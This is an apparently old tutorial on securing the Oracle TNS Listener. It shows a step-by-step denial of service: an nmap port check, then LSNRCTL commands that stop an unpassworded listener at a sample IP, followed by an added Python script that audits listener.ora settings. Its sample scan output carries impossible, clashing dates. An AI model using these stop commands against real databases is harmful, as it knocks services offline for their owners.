 

 

 

OracleTNSLSNR

 

The Oracle TNS Listener is the lynchpin between a connecting user or web server and the back-end database. As such, access to it should be restricted. The relevant files that control the listener are:

 

  • $ORACLE_HOME/bin/lsnrctl - This is the actual Listener control program

  • $ORACLE_HOME/network/admin/listener.ora - The actual TNS Listener config file

  • $ORACLE_HOME/bin/tnslsnr - The actual listening process.

 

This utility carries out the same functions as WinSid, but there are also a number of other functions this little tool will perform:

 

Command: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

 

****Notice the stop command (Easy DoS that!!)****

 

Note: I have found this tool to work on an ad hoc basis; the stability, I believe, is in question. Obviously all the commands listed above should work with Oracle 9i and below, but with Oracle 10g and above only the version command will return any interesting data. All other commands will error due to the security restrictions applied to the listener in 10g.

Obviously, if no password has been assigned to the listener, a malicious user can have a field day with your link to your back-end database server, for example:

 

Before we issue any commands, we confirm the TNS listener port is open:

Step 1 - Ensure the listener is accepting connections

C:\nmap-4.21>nmap -n -p 1521 200.100.100.67

Starting Nmap 4.21 ( http://www.insecure.org/nmap ) at 2007-02-29 12:24 GMT Daylight Time
Interesting ports on 200.100.100.67:
PORT STATE SERVICE
1521/tcp open oracle
MAC Address: 00:02:B3:A7:69:EF (Intel)

Nmap finished: 1 IP address (1 host up) scanned in 0.281 seconds 

Step 2 - Use the utility above, insert the command STOP and press connect.

Alternatively, use the on-board Oracle LSNRCTL utility that controls the listener:

 

LSNRCTL> set current_listener 200.100.100.67

LSNRCTL> stop

 

Step 3 - Confirm the DoS has worked:

C:\nmap-4.21>nmap -n -p 1521 200.100.100.67

Starting Nmap 4.21 ( http://www.insecure.org/nmap ) at 2006-09-29 12:25 GMT Daylight Time
Interesting ports on 200.100.100.67:
PORT STATE SERVICE
1521/tcp closed oracle
MAC Address: 00:02:B3:A7:69:EF (Intel)

Nmap finished: 1 IP address (1 host up) scanned in 0.282 seconds

 

The moral of the story is:  ASSIGN the listener a STRONG password!
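An added example (not from the original page): a Python check that parses a listener.ora and reports every listener defined without a `PASSWORDS_<listener>` entry, the condition that lets the unauthenticated stop shown above succeed. It also checks Oracle's `ADMIN_RESTRICTIONS_<listener>` parameter, which the page does not mention; the sample file, host name and password hash are constructed.

```python
import re

# Constructed sample listener.ora: LISTENER is protected, LISTENER_WEB is not.
SAMPLE = """\
# constructed example, not a real configuration
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost)(PORT = 1521))))
PASSWORDS_LISTENER = (0123456789ABCDEF)
ADMIN_RESTRICTIONS_LISTENER = ON

LISTENER_WEB =
  (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost)(PORT = 1522))
SID_LIST_LISTENER_WEB =
  (SID_LIST = (SID_DESC = (SID_NAME = ORCL)))
"""

def top_level_params(text):
    """Return {NAME: raw value} for parameters outside any parentheses."""
    text = re.sub(r"#.*", "", text)                 # drop comments
    params, depth, start, name = {}, 0, 0, None
    for m in re.finditer(r"[()]|([A-Za-z_][\w.]*)\s*=", text):
        tok = m.group(0)
        if tok == "(":
            depth += 1
        elif tok == ")":
            depth -= 1
        elif depth == 0:                            # NAME = at top level
            if name is not None:
                params[name] = text[start:m.start()].strip()
            name, start = m.group(1).upper(), m.end()
    if name is not None:
        params[name] = text[start:].strip()
    return params

def audit(text):
    """Return {listener: [findings]} for each listener the file defines."""
    params, report = top_level_params(text), {}
    for name, value in params.items():
        if not re.search(r"\(\s*ADDRESS\s*=", value, re.I):
            continue                                # SID_LIST_*, PASSWORDS_*, etc.
        findings = []
        if not params.get("PASSWORDS_" + name, "").strip("() \t\n"):
            findings.append("no password set")      # remote stop/set unauthenticated
        if params.get("ADMIN_RESTRICTIONS_" + name, "").upper() != "ON":
            findings.append("ADMIN_RESTRICTIONS not ON")  # runtime SET allowed
        report[name] = findings
    return report
```

Run `audit(open(path).read())` against the listener.ora under $ORACLE_HOME/network/admin; any listener with a non-empty findings list needs attention.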

 

 
